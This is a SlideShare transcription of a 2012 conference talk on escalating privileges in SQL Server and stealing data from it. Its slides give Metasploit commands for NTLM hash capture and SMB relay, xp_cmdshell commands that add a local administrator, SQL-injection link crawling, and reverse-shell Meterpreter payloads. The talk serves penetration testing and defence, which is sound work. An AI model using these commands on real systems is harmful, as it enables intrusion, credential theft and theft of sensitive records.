SlideShare a Scribd company logo

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

Scott Sutherland
Scott Sutherland

During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. More security blogs by the authors can be found @ https://www.netspi.com/blog/

Technology
1 of 76
Download to read offline
SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
DOMAIN user  DATABASE user Privilege Inheritance
Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access asef
Privilege Inheritance: Verify Access asef
DATABASE USER  OS ADMIN SMB Capture/Relay
SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
DEMO
Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin asef
Do a crazy whale dance! To the left… To the right… Now dive!
DATABASE ADMIN  OS ADMIN xp_cmdshell
XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
FINDING DATA
Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
Finding Data: Module Output asef
Finding Data: Demo DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
Shared Service Accounts: Diagram asef
Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
Database Link Crawling: Diagram asef
Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
Database Link Crawling: Attack! asef
Database Link Chaining: Demo DEMO
Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
Conclusions Configure SMB SIGNING
Conclusions don’t do DRUGS
Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012

Recommended

SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
Bernardo Damele A. G.
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
Miroslav Stampar
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 

Recommended

SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
Bernardo Damele A. G.
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
Miroslav Stampar
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
Mauricio Velazco
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
Herman Duarte
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
SQL Server Clustering Part1
SQL Server Clustering Part1SQL Server Clustering Part1
SQL Server Clustering Part1
Sql Trainer Kareem
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
قصي نسور
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software Seguro
Augusto Lüdtke
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
Scott Sutherland
 

More Related Content

What's hot

Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
Mauricio Velazco
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
Herman Duarte
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
SQL Server Clustering Part1
SQL Server Clustering Part1SQL Server Clustering Part1
SQL Server Clustering Part1
Sql Trainer Kareem
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
قصي نسور
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software Seguro
Augusto Lüdtke
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar
 

What's hot (20)

Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
SQL Server Clustering Part1
SQL Server Clustering Part1SQL Server Clustering Part1
SQL Server Clustering Part1
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software Seguro
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 

Viewers also liked

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
Scott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
Scott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
Scott Sutherland
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 

Viewers also liked (6)

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 

Similar to SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
Scott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloud
Tahsin Hasan
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guide
Seungmin Shin
 
Mysql all
Mysql allMysql all
Mysql all
Prof. Wim Van Criekinge
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
Alessandro Pilotti
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
Wim Godden
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0
Mydbops
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
Scott Sutherland
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxRoger Eisentrager
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
Wim Godden
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
MongoDB
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replication
PoguttuezhiniVP
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
Puppet
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017
Dave Stokes
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringConrad Cruz
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Conrad Cruz
 

Similar to SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 (20)

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloud
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guide
 
Mysql ppt
Mysql pptMysql ppt
Mysql ppt
 
Mysql all
Mysql allMysql all
Mysql all
 
Mysql all
Mysql allMysql all
Mysql all
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Security features In MySQL 8.0
